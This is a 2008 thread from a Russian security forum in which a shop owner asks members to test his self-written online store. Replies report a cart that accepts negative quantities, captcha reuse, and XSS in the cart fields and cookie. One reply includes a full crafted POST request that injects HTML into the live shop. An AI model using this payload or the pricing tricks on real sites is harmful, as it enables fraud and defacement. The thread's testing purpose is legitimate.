HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Проверка на уязвимости
Перезагрузить страницу Инет-магазин
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Инет-магазин
  #1  
Старый 05.01.2008, 18:57
SleepShadowWeb
Новичок
Регистрация: 02.02.2006
Сообщений: 28
С нами: 10667697

Репутация: 54
По умолчанию Инет-магазин
сайт самописный, форумы не смотреть.
проверял Spider`ом вроде особо не находил такого критичного.
но для полной уверенности прошу Вашей помощи.
адрес сайта: http://green-leaf.ru/1/index1.php
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 29.03.2008, 04:45
d_x
Постоянный
Регистрация: 25.03.2008
Сообщений: 670
С нами: 9541766

Репутация: 2407


По умолчанию
Пока нашёл, то что можно добавить в корзину отрицательное число товаров.
 
Ответить с цитированием

  #3  
Старый 29.03.2008, 11:50
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию
XSS
хз как я это сделал, я так нелюблю в аяксе копаться поэтому запросы редактировал

Код:
POST http://green-leaf.ru/1/data/188.php HTTP/1.0
Method: POST http://green-leaf.ru/1/data/188.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.26 (Windows NT 5.1; U; ru)
Host: green-leaf.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Referer: http://green-leaf.ru/1/data/188.php
Cookie: prices_korzina=d80804d682988ec69ef6773be58b3044; Apache=86.106.217.37.377191206776053497
Cookie2: $Version=1
Proxy-Connection: close
Content-Length: 310
Content-Transfer-Encoding: binary

xajax=setDobInKorzina&xajaxr=120677663512'&xajaxargs[]=13366'&xajaxargs[]=<h1>Hello%20:)</h1>%20LG%20DGK774%20%D1%87%D0%B5%D1%80%D0%BD%D1%8B%D0%B9%20DVD%2BRW%2C%20DVD-R%2C%20-RW%2C%20MP3%2C%20JPEG%2C%20%D0%BA%D0%B0%D1%80%D0%B0%D0%BE%D0%BA%D0%B5&xajaxargs[]=<h1>O_o&xajaxargs[]=''%20%D0%BC%D0%B5%D1%81%20%D1%81%2F%D1%86
В базу так и добовляется с XSSными названиями, ппц, мне пришлют если я закажу домашний кинотеатр за 1$
=========================
http://green-leaf.ru/1/zakaz.php
Rfgnxf не обновляется, зажал enter он заказов 50 наверно отправил с 1 каптчи все приняты

Дальше давайте сами а я гамать иду
Кстати почему все товары хранятся на http://www.ultracomp.ru/
Последний раз редактировалось Ponchik; 29.03.2008 в 12:05..
 
Ответить с цитированием

  #4  
Старый 07.04.2008, 19:01
SleepShadowWeb
Новичок
Регистрация: 02.02.2006
Сообщений: 28
С нами: 10667697

Репутация: 54
По умолчанию
спасибо d_x и Ponchik
 
Ответить с цитированием

  #5  
Старый 08.04.2008, 09:14
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию
Чувак, тыж не исправил ничерта

И когда мне её доставят?

Ты передавай значения не через POST а через SESSION
 
Ответить с цитированием

  #6  
Старый 14.06.2008, 22:53
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами: 9709737

Репутация: 88
По умолчанию
Ну тут в основном хостинг дырявый:
Цитата:
PHP HTML Entity Encoder Heap Overflow Vulnerability
Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1
Короче надо обновить им PHP и Апач профиксить
----------------------------------------
А на сайте:
XSS
korzina.php
Переменная prices_korzina
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
халявный инет stalles Болталка 4 22.02.2006 23:11
Про халявный инет))))))))))) silveran "Железо" 0 10.12.2005 03:39
Какие цены на инет в твоём городе? -artik- Болталка 31 14.09.2005 08:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.